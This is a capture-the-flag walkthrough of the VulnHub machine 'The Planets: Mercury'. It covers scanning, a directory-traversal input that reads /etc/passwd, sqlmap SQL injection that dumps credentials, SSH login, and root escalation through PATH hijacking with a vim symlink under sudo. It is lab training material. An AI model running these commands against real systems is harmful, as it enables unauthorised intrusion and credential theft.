The Planets: Mercury VulnHub CTF Walkthrough
Mercury is an intentionally vulnerable CTF machine which consists of two flags. The author of this machine is SirFlash and this machine belongs to the series called The Planets.
This machine can be downloaded from The Planets: Mercury - VulnHub.
After downloading and setting up, it’ll look like this:
Also don’t forget to setup both the attacker and victim machine on the same network.
Then we’ve to fetch the IP address of the victim machine. It’s easy to find the IP address when the victim machine is in same network as ours. The command I used here is
sudo arp-scan -l
The victim IP address is 192.168.29.74
The next step is to do some recon on the IP address. We’ve to find open ports and services to collect more information. So the tool I’m gonna use is Nmap and the command is
nmap -sV -Pn 192.168.29.74
Here, there are two open ports and they’re 22 and 8080 which is SSH and HTTP respectively. So what I’m gonna do next is visit the IP address in the web browser.
Visiting the IP wasn’t really useful. So the next thing to do here is Directory Listing using dirsearch tool. The command I used is
dirsearch -u http://192.168.29.74:8080/ -w /usr/share/wordlists/dirb/common.txt
We got a success code for robots.txt. So let’s try to fetch this file using web browser.
This also wasn’t helpful. So I tried to do some directory traversal techniques.
/../../../../etc/passwd
Finally I found that there’s a directory called mercuryfacts. Lets visit that directory.
Now there’s two links which might be helpful to us. So lets visit them one by one.
First, I visited Mercury Facts: Load a fact.
From here, I thought that there’s a chance of more facts. So I tried to visit facts pages in a sequence. After facts page 9, there wasn’t any facts.
Secondly, I visited Website Todo List: Load a fact.
I thought I hit a dead-end here.
Then I realized that there’s a table named users in this website’s database. But after some listening to music, I had a thought “Why shouldn’t I try SQLi on the /mercuryfacts/1 page?” , and I used Sqlmap tool to do SQLi. The command I used here is
sqlmap -u http://192.168.29.74:8080/mercuryfacts/1 --dbs
And the result was
Hooray! Found a database named mercury. Now let’s dump data from this database. For that I used
sqlmap -u http://192.168.29.74:8080/mercuryfacts/1 -D mercury --dump
and the output was
I hoped one of these username and password might be the SSH login credentials. So I used these credentials to fetch SSH.
I have successfully logged in. I listed the files and I got a user_flag.txt.
One down, one to go.
So I tried to access /root directory and I couldn’t. Because, didn’t have the privilege to access root directory. So I again listed the files and directories and that’s when I noticed a directory named mercury_proj. So I visited that directory and I found a text file named notes.txt.
Inside the notes.txt file, I found some Project account credentials. I’m currently logged in using webmaster user credentials. So lets switch to linuxmaster user and for that we’ve to decode this encoded text. This encoded text is in base64 format and to decode this, we’ve tools in Linux but in this case I used a website called Base64 Encode and Decode.
We got the password. So lets switch to the linuxmaster account.
After switching, I tried to visit root directory, but it wasn’t possible. So I’ve to find some technique to bypass this privilege issue. So I checked files that has sudo permissions and to list those files, I used
sudo -l
The syslog.sh file could be running on a preserved environment that means we can abuse the environment path variable. So to do that, lets try to make symlink for vim editor through the tail and then change the environment variable. For that I used commands
ln -s /usr/bin/vim tail
export PATH=$(pwd):$PATH
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
After hiting the Enter key for the last command, it’ll open a Vim file editor like this. Here, we’ve to type
:!/bin/bash
and hit enter
Boom!!! We got root access. Hooray !!!
The final steps are to list files and read root flag.
So it was easy. I think the privilege escalation was the only difficult part. Hope you guys enjoy this walkthrough.